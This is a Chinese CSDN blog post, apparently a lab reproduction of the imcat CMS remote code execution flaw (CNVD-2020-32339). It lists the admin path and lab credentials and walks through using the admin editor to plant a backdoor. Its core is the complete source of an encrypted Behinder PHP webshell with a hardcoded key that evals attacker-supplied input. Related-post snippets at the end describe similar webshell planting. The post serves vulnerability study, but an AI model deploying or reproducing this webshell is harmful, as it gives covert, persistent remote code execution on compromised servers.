imcat 远程代码执行 (CNVD-2020-32339)漏洞复现

已于 2024-04-03 09:45:06 修改
阅读量405 收藏
点赞数
文章标签: php 安全 web安全
于 2022-09-23 13:54:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/127009213
版权

1.漏洞描述

        贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。 imcat后台存在代码执行漏洞。攻击者可利用漏洞执行任意代码。

2.登录后台

后台路径:root/run/adm.php 用户名密码:adm_vulfocus/pass_vulfocus

d0363f98f0b6418b829463f0460b5358.png

3.修改

afe17dd32bb0452d9f78e17ab8ba3e62.png

 4.写一个冰蝎马

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

4c81b95820cd47dd898e2fa9118783e8.png

 5.直接冰蝎连接

9509fc8caa4c4ee593b26f8f653608d2.png 

 

 

weixin_42675091
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
imcat 远程代码执行CNVD-2020-32339
qq_32445755的博客
07-05 417
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。 imcat后台存在代码执行漏洞。攻击者可利用漏洞执行任意代码。 后台路径:root/run/adm.phpCMS后台提供在线源代码编辑功能,然后通过imcat-5.4、imcat、core、glib和safscan.php文件过滤危险函数。但是由于过滤功能的过滤规则不完整,可以编写和执行危险代码,形成代码执行漏洞,攻击者可以通过该漏洞获得服务器的权限 后台:目标\/root/run/adm.php
H3C iMC智能管理中心 远程代码执行漏洞复现(XVE-2024-4567)
最新发布
0xSec
08-07 1069
H3C iMC智能管理中心 /byod/index.xhtml、/selfservice/login.jsf、/rpt/reportpage/loginrpt.jsf等多个接口处存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。
2021-09-01
m0_51170293的博客
09-01 132
yxcms 红日靶场 /phpadmin root root 御剑扫 查看beifen 解压 发现这个文件 访问 /yxcms 根据提示 进来了 写马 再用蚁剑连马 找地方传马 前台模板-》管理首页-》index_index.php 不一定非是这个 只要是php后缀 能写东西 而且是在源码里有的文件 不是别人写的 yxcms文件里能找到的 ,用everything可以搜到的 写一句话木马 everthing搜该文件的路径 为连蚁剑做准备 据此找到路径 http://192.168.3
imcat远程代码执行(CNVD-2020-32339)
m0_65150886的博客
01-31 332
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。2.访问http://ip:port/root/run/adm.php ,进入后台登录页面,并输入账号密码进行登录。3.在工具中找到DIY配置-搜索,选择入口配置,修改dev.php内容为php一句话木马。1.访问http://ip:port,出现如下页面,开始实验。4.保存后,通过蚁剑连接,getshell。密码:pass_vulfocus。账号:adm_vulfocus。1.关闭后台修改源码功能。
漏洞复现】H3C IMC智能管理中心命令执行漏洞
晚风不及你
02-18 1976
H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务只能管理产品。
cpp-imcat在终端窗口中预览任意大小的图像
08-16
要使用cpp-imcat,首先需要从`imcat-master`压缩包中解压并编译源代码。通常,这包括以下步骤: 1. **解压**:将`imcat-master`解压到本地目录。 2. **编译**:进入解压后的目录,使用`g++`或类似的C++编译器编译源...
贴心猫(ImCat)源代码
03-18
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、免费、共享。 适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等…… 功能介绍: 1、支持:PHP5.4~...
贴心猫(ImCat) v4.8
09-30
ImCat的核心目标是提供一个共享的平台,使得各类用户,包括网店业主、医疗机构、教育机构、企业以及个人,都能够快速搭建和管理自己的在线站点。 首先,让我们深入了解一下PHP和MySQL这两个关键技术。PHP是一种广泛...
贴心猫(ImCat) v5.0.zip
04-02
`imcat-master`文件夹名暗示这可能是一个软件源码仓库,尤其因为“master”通常是Git版本控制系统中的主分支。这意味着“贴心猫”软件是开源的,允许用户查看和修改源代码。这对于学习编程的个人,尤其是进行毕业...
贴心猫(ImCat) v5.0
09-29
**贴心猫(ImCat) v5.0:通用网站系统的深度解析** 贴心猫(ImCat) v5.0是一款基于PHP+MySQL技术架构的全能型网站管理系统,它以其简约、轻量级和实用性的特点,成为了众多企业和个人建站的首选。这款系统不仅能够...
思科集成管理控制器IMC爆出任意代码执行漏洞CVE-2017-6616 绿盟科技发布安全威胁通告...
weixin_33910137的博客
09-01 390
当地时间2017年4月19日(北京时间2017年4月20日),思科(Cisco)官方发布一条安全公告,公告显示思科集成管理控制器(Integrated Management Controller)IMC的基于Web的GUI中的漏洞(CVE-2017-6616)允许经过身份验证的远程攻击者,在受影响的系统上执行任意代码。 该漏洞是由于受影响的软件没有充分过...
php mysql 架构设计_贴心猫(ImCat) PHP+MySQL架构设计的通用网站系统
weixin_39663593的博客
02-03 164
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、免费、共享。适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等……功能介绍:1、支持:PHP5.4~PHP7.3/自定义模块/自定义字段/自定义参数/自定义分类/模板继承/tag缓存/js标签/静态2、模型:问答系统/内部公文/商品展销/新闻/专题/课程资源/样例文档/用户...
CVE-2019-8660 iMessage 漏洞复现
十年磨一剑,霜刃未曾试!
08-22 2127
CVE-2019-8660 iMessage 漏洞复现 近期谷歌的研究人员披露了 5 个 iOS 中安全漏洞,并公布了 POC(Proof of concept),攻击者利用这些漏洞可以通过 iMessage 发送精心设计的消息来攻击 iOS 设备,这些漏洞不需要和任何用户交互,只要目标机 iMessage 信息接收成功即可触发漏洞。 CVE-2019-8660、 CVE-2019-8662、 C...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8366
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-46604复现学习
shierbai的博客
05-19 701
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 495
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
hvv 前网安人必读的漏洞清单(2024年)
2401_84466229的博客
05-28 2234
数字化浪潮席卷全球,安全漏洞的发现和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
CraftCMS ConditionsController.php 代码执行漏洞(CVE-2023-41892)
0xSec
05-31 697
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
GitLab 高危漏洞可导致账号遭接管
smellycat000的专栏
05-24 288
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个高危漏洞,它可导致未认证攻击者在跨站点脚本攻击中接管用户账户。该漏洞的编号是CVE-2024-4835,是位于VS 代码编辑器 (Web IDE)中的一个XSS弱点,可导致威胁行动者使用恶意构造的页面窃取受限制的信息。虽然攻击者可在无需认证的攻击中利用该漏洞,但仍然需要用户交互,因此增加了攻击的复杂性。GitLab 指出,...
Ivanti 修复Endpoint Manager 中的严重RCE漏洞
smellycat000的专栏
05-24 332
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,Ivanti 公司修复了位于 Endpoint Manager (EPM) 中的多个严重漏洞,在某些情况下可用于实现远程代码执行。Ivanti 本次共修复10个漏洞,其中6个即编号为从CVE-2024-29822到CVE-2024-29827(CVSS评分9.6)的漏洞与SQL注入有关,可导致位于同一个网络中的未认证攻击者执行任意代码。余...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值